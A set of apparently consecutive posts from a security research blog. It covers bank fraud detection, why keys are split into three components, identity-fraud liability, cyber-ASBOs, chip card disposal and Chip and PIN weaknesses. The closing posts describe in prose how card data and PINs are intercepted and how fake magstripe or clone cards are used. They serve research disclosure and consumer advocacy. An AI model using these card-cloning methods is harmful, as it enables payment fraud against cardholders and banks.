Light Blue Touchpaper

After almost 3 years of problem-free banking in the UK I recently received the following letter from HSBC’s “Accounts Review Team”. It advised me that the HSBC group no longer wished to have me as a customer and that I had 30 days to move my banking to an establishment in no way connected to HSBC, before they would close my account. Confident that I had not indulged in any illegal activity recently, and concerned about their reasons for taking such action, I attempted several times to phone the number given in the letter, unsuccessfully reaching a “we are busy, please try again” recording each time. Visiting my home branch was not much more helpful as they claimed that the information had not been shared with them. I was advised to make a written complaint and was told that the branch had already referred the matter, as a number of customers had come in with similar letters.

After two written complaints and a phone call to customer services, a member of the “Team” finally contacted me. She enquired about a single international deposit into my account, which I then explained to be my study grant for the coming year. Upon this explanation I was told that the bank would not close my account, and I was given a vague explanation of them not expecting students to get large deposits. I found this strange, since it had not been a problem in previous years, and even stranger since my deposit had cleared into my account two days after the letter was sent. In terms of recent “suspicious” transactions, this left only two recent international deposits: one from my parents overseas and one from my savings, neither of which could be classified as large. I’m not an expert on complex behavioural analysis networks and fraud detection within banking systems, but would expect that study grants and family support are not unexpected for students? Moreover, rather than this being an isolated incident, it would seem that HSBC’s “account review” affected a number of people within our student community, some of whom might choose not to question the decision and may be left without bank accounts. This should raise questions about the effectiveness of their fraud detection system, or possibly a flawed behaviour model for a specific demographic.

My account is now restored, but I have still had no satisfactory explanation as to why the decision was made to close my account, nor do I know how this sorry affair will affect my future banking and credit rating. Would an attempt to transfer my account have caused HSBC’s negative opinion of me to spread to other institutions? A security mechanism that yields false positives or recommends a disproportionate reaction, e.g. closing an account based on a single unexpected transaction, should be seen as somewhat flawed. The end result is that the system runs on a guilty until proven innocent premise, with the onus for correcting marginal calls placed on the customer. Ultimately the bank will claim that these mechanisms are designed to protect the customer, but in the end randomly threatening to close my account does not make me feel any safer.

Some years ago I wrote a subsection in my thesis (sec 8.4.3, p. 154), entitled “How Many Security Officers are Best?”, where I reviewed over the various operating procedures I’d seen for Hardware Security Modules, and pondered why some people chose to use two separate parties to oversee a critical action and some chose to use three. Occasionally a single person is even deliberately entrusted with great power and responsibility, because there can be no question where to lay the blame if something goes wrong. So, “one, two, or three?”, I said to myself.

In the end I plumped for three… with some logic excerpted from my thesis below:

But three security officers does tighten security: a corrupt officer will be outnumbered, and deceiving two people in different locations simultaneously is next to impossible. The politics of negotiating a three-way collusion is also much harder: the two bad officers will have to agree on their perceptions of the third before approaching him. Forging agreement on character judgements when the stakes are high is very difficult. So while it may be unrealistic to have three people sitting in on a long-haul reconfiguration of the system, where the officers duties are short and clearly defined, three keyholders provides that extra protection.

Some time later, I mentioned the subject with Ross, and he berated me for my over-complicated logic. His general line of argument was along these lines “The real threat for Security Officers is not that they blackmail, bribe or coerce one another, it’s that they help! Here, Bob, you go home early mate; I know you’ve got to pack for your business trip, and I’ll finish off installing the software on the key loading PC. That sort of thing. Having three key custodians makes ‘helping’ and such friendly tactics much harder - the bent officer must co-ordinate on two fronts.”

But recently my new job has exposed me to a number of real dual control and split knowledge systems. I was looking over some source code for a key loading HSM command in fact, and I spotted code that took a byte array of key material, and split it into three components each with odd parity. It generates two fresh totally random components with odd parity, and then XORs these onto the third. Hmmm, I thought, so the third component would contain the parity information of the original key, dangerous — a leakage of information preferentially to the third key component holder! But wrong… because the parity of the original key is known anyway in the case of a DES key… it’s always odd.

I chatted to our chief technical bod about this, and he casually dropped a bombshell — that shed new light on why three is best, an argument so simple and elegant that it must be true, yet faintly depressing to now believe that no-one agonised over the human psychology of the security officer numbers issue as I did. When keys are exchanged a Key Check Value (KCV) is calculated for each component, by encrypting a string of binary zeroes with the component value. Old-fashioned DES implementations only accepted keys with odd parity, so to calculate KCVs on these components, each must have odd parity as well as the final key itself. For the final key to retain odd parity from odd parity components, there must be an odd number of components (the parity of keys could be adjusted, but this takes more lines of code, and is less elegant than just tweaking a counter in the ‘for’ loop). Now the smallest odd integer greater than one is three. This is why the most valuable keys are exchanged in three components, and not in two!

So, the motto of the story for me is to make sure to apply Occam’s Razor more thoroughly when I try to deduce the logic behind the status quo, but I still think there are some interesting questions raised about how we share responsibility for critical actions. There still seems to be to me a very marked and qualitative difference in the dynamics of how three people interact versus two, whatever the situation: be it security officers entering keys, pilots flying an aircraft, or even a ménage à trois! Just like the magnitude of the difference between 2D and 3D space.

If one, two and three are all magical numbers, qualitatively different, are there any other qualitative boundaries higher in the cardinal numbers, and if so, what are they? In a security-critical process such as an election, can ten people adjudicate effectively in a way that thirty could not? Is there underlying logic or just mysticism behind the jury of twelve? Or, to take the jury example, and my own tendency to over-complicate, was it simply that in the first proper court room built back a few hundred years ago, there happened only to be space for twelve men on the benches on the right hand side!

My book on Security Engineering is now available online for free download here.

I have two main reasons. First, I want to reach the widest possible audience, especially among poor students. Second, I am a pragmatic libertarian on free culture and free software issues; I believe many publishers (especially of music and software) are too defensive of copyright. I don’t expect to lose money by making this book available for free: more people will read it, and those of you who find it useful will hopefully buy a copy. After all, a proper book is half the size and weight of 300-odd sheets of laser-printed paper in a ring binder.

I’d been discussing this with my publishers for a while. They have been persuaded by the experience of authors like David MacKay, who found that putting his excellent book on coding theory online actually helped its sales. So book publishers are now learning that freedom and profit are not really in conflict; how long will it take the music industry?

The National Consumer Council has published a report on “identity fraud” which is rather regrettable.

Identity fraud is not fraud, from the consumer’s viewpoint. If someone pretends to be me, borrows 10K from the Derbyshire Building Society and vanishes, it’s the building society that’s the victim, not me. If Experian then says I’m a loan defaulter when I’m not, that’s libel. Suing for libel may be expensive, but the Information Commissioner has announced his willingness to issue enforcement notices against the credit agencies in such circumstances. The NCC should have advertised this fact and encouraged people to go to him.

“Identity fraud” is an objectionable concept, an attempt by the banks to dump some liability. The Home Office egg them on because they think that rebadging credit-card fraud as “identity fraud” will help sell identity cards. But it’s a bad show when consumer organisations collude with an attempt to make consumers the victims of bankers’ and credit reference agencies’ negligence.

Markus points us to a story on card fraud by German TV reporter Sabine Wolf, who reported some of our recent work on how cards get cloned.She reports a number of cases in which German holidaymakers had cards cloned in Italy. In one case, a sniffer in a chip and PIN terminal at a skilift in Livigno sent holidaymakers’ card and PIN details by SMS to Romania. These devices, which apparently first appeared in Hungary in 2003, are now becoming widespread in Europe; one model sits between a card reader and the retail terminal. (I have always refused to use my chip card at stores such as Tesco and B&Q where they want to swipe your card at the checkout terminal and have you enter your PIN at a separate PIN pad - this is particularly vulnerable to such sniffing attacks.)

According to Hungarian police, the crooks bribe the terminal maintenance technicians, or send people round stores pretending to be technicians; the Bavarian police currently have a case in which 150 German cardholders lost 600,000 Euro; the Guardia di Finanza in Genoa have a case in which they’ve recovered thousands of SMSs from phone company computers containing card data; a prosecutor in Bolzano believes that crooks hide in supermarkets overnight and wire up the terminals; and there are also cases from Sweden, France, and Britain. Customers tend to get blamed unless there’s such a large batch of similar frauds that the bank can’t fail to observe the pattern. (This liability algorithm gives the bankers every incentive not to look too hard.)

In Hungary, banks now routinely confirm all card transactions to their customers by SMS. Maybe that’s what banks here will be doing in a year or two (Barclays will already SMS you if you make an online payment to a new payee). It’s not ideal though as it keeps pushing liability to the customer. I suspect it might take an EU directive to push the liability firmly back on the banks, along the lines of the US Federal Reserve’s Regulation E.

Our beloved government is once again Taking Powers in the fight against computer crime. The Home Office proposes to create cyber-asbos that would enable the police to ban suspects from using such dangerous tools as computers and bank accounts. This would be done in a civil court against a low evidence standard; there are squeals from the usual suspects such as zdnet.

The Home Office proposals will also undermine existing data protection law; for example by allowing the banks to process sensitive data obtained from the public sector (medical record privacy, anyone?) and ‘dispelling misconceptions about consent’. I suppose some might welcome the proposed extension of ASBOs to companies. Thus, a company with repeated convictions for antitrust violations might be saddled with a list of harm-prevention conditions, for example against designing proprietary server-side protocols or destroying emails. I wonder what sort of responses the computer industry will make to this consultation

A cynic might point out that the ‘new powers’ seem in inverse proportion to the ability, or will, to use the existing ones. Ever since the South Sea Bubble in the 18th century, Britain has been notoriously lax in prosecuting bent bankers; city folk are now outraged when a Texas court dares to move from talk to action. Or take spam; although it’s now illegal to send unsolicited commercial emails to individuals in the UK, complaints don’t seem to result in action. Now trade and industry minister ‘Enver’ Hodge explains this is because there’s a loophole - it’s not illegal to spam businesses. So rather than prosecuting a spammer for spamming individuals, our beloved government will grab a headline or two by blocking this loophole. I don’t suppose Enver ever stopped to wonder how many spam runs are so well managed as to not send a single item to a single private email address - cheap headlines are more attractive than expensive, mesy implementation.

This pattern of behaviour - taking new powers rather than using the existing ones - is getting too well entrenched. In cyberspace we don’t have law enforcement any more - we have the illusion of law enforcement.

Yesterday my wife received through the post a pre-approved unsolicited gold mastercard with a credit limit of over a thousand pounds. The issuer was Debenhams and the rationale was that she has a store card anyway - if she doesn’t want to use the credit card she is invited to cut the credit card in half and throw it away. (Although US banks do this all the time and UK banks aren’t supposed to, I’ll leave to the lawyers whether their marketing tactics test the limits of banking regulation.)

My point is this: the average customer has no idea how to ‘cut up’ a card now that it’s got a chip in it. Bisecting the plastic using scissors leaves the chip functional, so someone who fishes it out of the trash might use a yescard to clone it, even if they don’t know the PIN. (Of course the PIN mailer might be in the same bin.)

Here at the Lab we do have access to the means to destroy chips (HNO3, HF) but you really don’t want that stuff at home. Putting 240V through it will stop it working - but as this melts the bonding wires, an able attacker might depackage and rebond the chip.

My own suggestion would be to bisect the whole chip package using a pair of tin snips. If you don’t have those in your toolbox a hacksaw should do. This isn’t foolproof as there exist labs that can retrieve data from chip fragments, but it’s probably good enough to keep out the hackers.

It does seem a bit off, though, that card issuers now put people to the trouble of devising a means of the secure disposal of electronic waste, when consumers mostly have neither the knowledge nor the tools to do so properly

Sky News had a piece on the Harvey case, which might be the first reported UK instance of chip-to-chip copying. The text is here and the video here.

The 12:30 ITN news on ITV1 today featured a segment (video) on Chip and PIN, and should also be shown at 19:00 and 22:30. It included an interview with Ross Anderson and some shots of me presenting our Chip and PIN interceptor. The demonstration was similar to the one shown on German TV but this time we went all the way, borrowing a magstripe writer and producing a fake card. This was used by the reporter to successfully withdraw money from an ATM (from his own account).

More details on how the device actually works are on our interceptor page. The key vulnerabilities present in the UK Chip and PIN cards we have tested, which the interceptor relies on, are:

• The entered PIN is sent from the terminal to the card in unencrypted form
• It is still possible to use magstripe-only cards to withdraw cash, with the same PIN used in shops
• All the details necessary to create a valid magstripe are also present on the chip

This means that a crook could insert a miniaturised version of the interceptor into the card slot of a Chip and PIN terminal, without interfering with the tamper detection. The details it collects include the PIN and enough information to create a valid magstripe. The fake card can now be used in ATMs which are willing to accept cards, which from its perspective, have a damaged chip — known as “fallback”. Some ATMs might even not be able to read the chip at all, particularly ones abroad.

The fact that the chip also includes the magstripe details is not strictly necessary, since a skimmer could also read this, but the design of some Chip and PIN terminals, which only cover the chip, make this difficult. One of the complaints against the terminals used in the Shell fraud was that they make it impossible to read the chip without reading the magstripe too. This led to suggestions that customers should not use such terminals, or even that they wipe their card’s magstripe to prevent skimmers from reading it.

While it is possible that the Shell fraudsters did read the magstripe, wiping it will not be a defence against them reading the communication between terminal and chip, which includes all the needed details. Even the CVV1, the code used to verify that a magstripe is valid, is on the chip (but not the CVV2, which is the 3 digit code printed on the back, used by ecommerce). This was presumably a backwards-compatibility measure, as was magstripe fallback. As shown by countless examples before, such features are frequently the source of security flaws.

We’ve got emails from several people complaining that after their card had been stolen, someone did a fraudulent transaction on it — without knowing the PIN. In some cases the victim had never used the card in a retail transaction and didn’t know the PIN.

An article in yesterday’s Daily Mail hints at how. In technical language, you read the card, which gives you everything except the MAC key. You now write this data to a fresh card, for which you know the PIN. If this clone card is used in an offline terminal, the transaction will go through and the log will show the PIN was correctly entered. The moral, I suppose, is that customers in dispute with their banks should demand that the banks disclose the MAC key and show that the MAC on the transaction log was correct. Whether their systems support this is of course another story.